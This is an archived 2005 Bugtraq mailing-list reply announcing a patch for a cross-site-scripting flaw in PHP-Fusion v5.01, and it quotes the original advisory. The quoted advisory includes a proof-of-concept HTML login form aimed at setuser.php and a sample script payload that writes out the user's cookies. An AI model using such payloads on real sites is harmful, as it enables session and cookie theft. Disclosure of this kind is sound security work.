Re: [PersianHacker.NET 200503-10]PHP-Fusion v5.01 Html Injection Vulnerability

[Sheldon King <sheldon () fileblitz com>]

In-Reply-To: <20050319082025.28662.qmail () www securityfocus com>

The main developer Digitanium was notified, a patch has been developed and released on the main website.

Quote from Main Developer Digitanium at http://www.php-fusion.co.uk

Pi3cH has reported a cross-site-scripting vulnerability. PHP-Fusion does not properly validate user-supplied input 
passed by the log-in form in 'user_info_panel.php'.

A remote user can access the target user's cookies (including authentication cookies), if any, associated with the site 
running the PHP-Fusion software, access data recently submitted by the target user via web form to the site, or take 
actions on the site acting as the target user. It's believed this is related to the new login system I plan to 
implement officially in v5.02, but have made available as a mod for v5.01. The details are not exact so I have added a 
security fix to v5.01 to close this vulnerability. I know this is must be annoying for everyone, especially as this is 
the 3rd security issue inside a month.

You must ensure that you update the file fusion_core.php, you can get the very latest file from the service pack which 
is available from the downloads area. The sourceforge files have also been updated. If you prefer to update manually 
please click Read More for details. Thanks to Pi3cH for the heads up.

End quote


Regards
Sheldon King
PHP Fusion Beta Team


> Received: (qmail 6620 invoked from network); 19 Mar 2005 18:05:19 -0000
> Received: from outgoing.securityfocus.com (HELO outgoing3.securityfocus.com) (205.206.231.27)
>  by mail.securityfocus.com with SMTP; 19 Mar 2005 18:05:19 -0000
> Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
>       by outgoing3.securityfocus.com (Postfix) with QMQP
>       id 7C19E237330; Sat, 19 Mar 2005 10:49:48 -0700 (MST)
> Mailing-List: contact bugtraq-help () securityfocus com; run by ezmlm
> Precedence: bulk
> List-Id: <bugtraq.list-id.securityfocus.com>
> List-Post: <mailto:bugtraq () securityfocus com>
> List-Help: <mailto:bugtraq-help () securityfocus com>
> List-Unsubscribe: <mailto:bugtraq-unsubscribe () securityfocus com>
> List-Subscribe: <mailto:bugtraq-subscribe () securityfocus com>
> Delivered-To: mailing list bugtraq () securityfocus com
> Delivered-To: moderator for bugtraq () securityfocus com
> Received: (qmail 3178 invoked from network); 19 Mar 2005 01:01:33 -0000
> Date: 19 Mar 2005 08:20:25 -0000
> Message-ID: <20050319082025.28662.qmail () www securityfocus com>
> Content-Type: text/plain
> Content-Disposition: inline
> Content-Transfer-Encoding: binary
> MIME-Version: 1.0
> X-Mailer: MIME-tools 5.411 (Entity 5.404)
> From: PersianHacker Team <pi3ch () yahoo com>
> To: bugtraq () securityfocus com
> Subject: [PersianHacker.NET 200503-10]PHP-Fusion v5.01 Html Injection
>    Vulnerability
>
>
>
> [PersianHacker.NET 200503-10]PHP-Fusion v5.01 Html Injection Vulnerability
> Date: 2005 March
> Bug Number: 10
>
> PHP-Fusion
> a light-weight open-source content management system (CMS) written in PHP. It utilises a mySQL database to store your 
> site content and includes a simple, comprehensive adminstration system. PHP-Fusion includes the most common features 
> you would expect to see in many other CMS packages
> More info @:
> http://php-fusion.co.uk/
>
>
> Discussion:
> --------------------
> The software does not properly validate user-supplied input in 'setuser.php'.
>
> A remote user can access the target user's cookies (including authentication cookies),
> if any, associated with the site running the PHP-Fusion software, access data
> recently submitted by the target user via web form to the site, or take actions
> on the site acting as the target user.
>
>
> Exploit:
> --------------------
> <html>
>
> <head>
> <title>PHP-Fusion v5.01 Exploit</title>
> </head>
>
> <body>
>
> <h1>PHP-Fusion v5.01 Html Injection Exploit</h1>
>
>
> <form method="POST" action="http://www.example.com/setuser.php";>
>  <b>XSS in register.php:</b><p>
>  Username:
>  <input type="text" name="user_name" size="48" value="XSS Injection Code"></p>
>  <p>
>  Password:
>  <input type="text" name="user_pass" size="48" value="XSS Injection Code"></p>
>  <p><input type='checkbox' name='remember_me' value='y'>Remember Me<br><br>
>  exmple: &lt;script&gt;document.write(document.cookie)&lt;/script&gt;</p>
>  <p>&nbsp;<input type='submit' name='login' value='RUN!' class='button'></p>
> </form>
> <p>&nbsp;</p>
> <p align="center"><a href="http://www.PersianHacker.NET";>www.PersianHacker.NET</a></p>
>
> </body>
>
> </html>
>
>
> Solution:
> --------------------
> No solution was available at the time of this entry.
>
>
> Credit:
> --------------------
> Discovered by PersianHacker.NET Security Team
> by Pi3cH (pi3ch persianhacker net)
> http://www.PersianHacker.NET
>
> Special Thanks: devil_box(for xss article), amectris, herbod.
>
>
> Help
> --------------------
> visit: http://www.PersianHacker.NET
> or mail me @: pi3ch persianhacker net